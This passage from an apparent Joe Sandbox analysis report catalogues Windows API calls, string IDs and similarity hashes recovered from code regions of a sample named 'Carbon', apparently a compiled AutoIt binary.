                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0096871C
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00968730
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0096875A
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00968774
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00968786
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 009687CF
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0096881F
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile
                                                            • String ID: *.*
                                                            • API String ID: 769691225-438819550
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 008F6337
                                                              • Part of subcall function 008F63C7: GetClientRect.USER32(?,?), ref: 008F63ED
                                                              • Part of subcall function 008F63C7: GetWindowRect.USER32(?,?), ref: 008F642E
                                                              • Part of subcall function 008F63C7: ScreenToClient.USER32(?,?), ref: 008F6456
                                                            • GetDC.USER32 ref: 0093509B
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009350AE
                                                            • SelectObject.GDI32(00000000,00000000), ref: 009350BC
                                                            • SelectObject.GDI32(00000000,00000000), ref: 009350D1
                                                            • ReleaseDC.USER32(?,00000000), ref: 009350D9
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0093516A
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009840E3
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009840F8
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00984112
                                                            • _wcslen.LIBCMT ref: 00984157
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00984184
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009841B2
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcslen
                                                            • String ID: SysListView32
                                                            • API String ID: 2147712094-78025650
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0095C3FE
                                                            • IsMenu.USER32(00000000), ref: 0095C41E
                                                            • CreatePopupMenu.USER32 ref: 0095C454
                                                            • GetMenuItemCount.USER32(00B5F2F8), ref: 0095C4A5
                                                            • InsertMenuItemW.USER32(00B5F2F8,?,00000001,00000030), ref: 0095C4CD
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 642191829-3771769585
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 009740F2
                                                            • CharUpperBuffW.USER32(?,?), ref: 00974201
                                                            • _wcslen.LIBCMT ref: 00974211
                                                            • VariantClear.OLEAUT32(?), ref: 009743A6
                                                              • Part of subcall function 009613C8: VariantInit.OLEAUT32(00000000), ref: 00961408
                                                              • Part of subcall function 009613C8: VariantCopy.OLEAUT32(?,?), ref: 00961411
                                                              • Part of subcall function 009613C8: VariantClear.OLEAUT32(?), ref: 0096141D
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4137639002-1221869570
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsWindow.USER32(00B5F500), ref: 00988623
                                                            • IsWindowEnabled.USER32(00B5F500), ref: 0098862F
                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0098870A
                                                            • SendMessageW.USER32(00B5F500,000000B0,?,?), ref: 0098873D
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00988775
                                                            • GetWindowLongW.USER32(00B5F500,000000EC), ref: 00988797
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009887AF
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0095E062
                                                            • LoadStringW.USER32(00000000), ref: 0095E069
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0095E07F
                                                            • LoadStringW.USER32(00000000), ref: 0095E086
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0095E0CA
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0095E0A7
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 4072794657-3128320259
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 008F63ED
                                                            • GetWindowRect.USER32(?,?), ref: 008F642E
                                                            • ScreenToClient.USER32(?,?), ref: 008F6456
                                                            • GetClientRect.USER32(?,?), ref: 008F6594
                                                            • GetWindowRect.USER32(?,?), ref: 008F65B5
                                                            Similarity
                                                            • API ID: Rect$Client$Window$Screen
                                                            • String ID:
                                                            • API String ID: 1296646539-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __allrem.LIBCMT ref: 0092037A
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00920396
                                                            • __allrem.LIBCMT ref: 009203AD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009203CB
                                                            • __allrem.LIBCMT ref: 009203E2
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00920400
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 009738D0: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,009717A3,00000000,?,?,00000000), ref: 0097391C
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00972547
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00972568
                                                            • WSAGetLastError.WSOCK32 ref: 00972579
                                                            • inet_ntoa.WSOCK32(?), ref: 00972613
                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00972662
                                                            • _strlen.LIBCMT ref: 009726BC
                                                              • Part of subcall function 009540D3: _strlen.LIBCMT ref: 009540DD
                                                              • Part of subcall function 008F76BB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0090C099,?,?,?), ref: 008F76D7
                                                              • Part of subcall function 008F76BB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0090C099,?,?,?,?,008F9E49,?,?), ref: 008F770A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                            • String ID:
                                                            • API String ID: 1923757996-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00918629,00918629,?,?,?,0092679F,00000001,00000001,8BE85006), ref: 009265A8
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0092679F,00000001,00000001,8BE85006,?,?,?), ref: 0092662E
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00926728
                                                            • __freea.LIBCMT ref: 00926735
                                                              • Part of subcall function 00923B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00916A59,?,0000015D,?,?,?,?,00918590,000000FF,00000000,?,?), ref: 00923BA2
                                                            • __freea.LIBCMT ref: 0092673E
                                                            • __freea.LIBCMT ref: 00926763
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 0097D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097BE35,?,?), ref: 0097D13C
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D178
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D1E6
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D21C
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0097C451
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0097C4AC
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097C4F1
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0097C520
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0097C57A
                                                            • RegCloseKey.ADVAPI32(?), ref: 0097C586
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 1120388591-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009883D1
                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 009883F6
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0098840E
                                                            • GetSystemMetrics.USER32(00000004), ref: 00988437
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0096BF1C,00000000), ref: 00988457
                                                              • Part of subcall function 00909DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00909DE2
                                                            • GetSystemMetrics.USER32(00000004), ref: 00988442
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009845F3
                                                            • IsMenu.USER32(?), ref: 00984608
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00984650
                                                            • DrawMenuBar.USER32 ref: 00984663
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID: 0
                                                            • API String ID: 3076010158-4108050209
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 00954392: GetClassNameW.USER32(?,?,000000FF), ref: 009543B5
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00952548
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0095255B
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 0095258B
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2081771294-1403004172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 0097D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097BE35,?,?), ref: 0097D13C
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D178
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D1E6
                                                              • Part of subcall function 0097D11F: _wcslen.LIBCMT ref: 0097D21C
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0097C22C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0097C287
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0097C2EA
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 0097C32D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0097C33A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 826366716-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?,?,009509E5), ref: 009506B2
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?), ref: 009506CD
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?), ref: 009506DB
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?), ref: 009506EB
                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009505C8,80070057,?,?), ref: 009506F7
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00956351
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00956368
                                                            • MessageBeep.USER32(00000000), ref: 00956380
                                                            • KillTimer.USER32(?,0000040A), ref: 0095639C
                                                            • EndDialog.USER32(?,00000001), ref: 009563B6
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 0092257E
                                                              • Part of subcall function 00922D18: RtlFreeHeap.NTDLL(00000000,00000000,?,0092DB22,009C1DB4,00000000,009C1DB4,00000000,?,0092DB49,009C1DB4,00000007,009C1DB4,?,0092DF46,009C1DB4), ref: 00922D2E
                                                              • Part of subcall function 00922D18: GetLastError.KERNEL32(009C1DB4,?,0092DB22,009C1DB4,00000000,009C1DB4,00000000,?,0092DB49,009C1DB4,00000007,009C1DB4,?,0092DF46,009C1DB4,009C1DB4), ref: 00922D40
                                                            • _free.LIBCMT ref: 00922590
                                                            • _free.LIBCMT ref: 009225A3
                                                            • _free.LIBCMT ref: 009225B4
                                                            • _free.LIBCMT ref: 009225C5
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00910592: EnterCriticalSection.KERNEL32(009C16FC,?,?,?,008FC0BA,009C3560,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 0091059D
                                                              • Part of subcall function 00910592: LeaveCriticalSection.KERNEL32(009C16FC,?,?,?,008FC0BA,009C3560,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 009105DA
                                                              • Part of subcall function 008FA1D4: _wcslen.LIBCMT ref: 008FA1DE
                                                              • Part of subcall function 009103F3: __onexit.LIBCMT ref: 009103F9
                                                            • __Init_thread_footer.LIBCMT ref: 00978382
                                                              • Part of subcall function 00910548: EnterCriticalSection.KERNEL32(009C16FC,?,?,008FC0E8,009C3560,00932799,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 00910552
                                                              • Part of subcall function 00910548: LeaveCriticalSection.KERNEL32(009C16FC,?,008FC0E8,009C3560,00932799,009C2408,00000001,00000000,CMDLINERAW,?,009C2408,?,?,?,00000000), ref: 00910585
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                            • API String ID: 535116098-3733170431
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00986081
                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009860AE
                                                            • DrawMenuBar.USER32(?), ref: 009860BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Menu$InfoItem$Draw
                                                            • String ID: 0
                                                            • API String ID: 3227129158-4108050209
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmp
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00972284
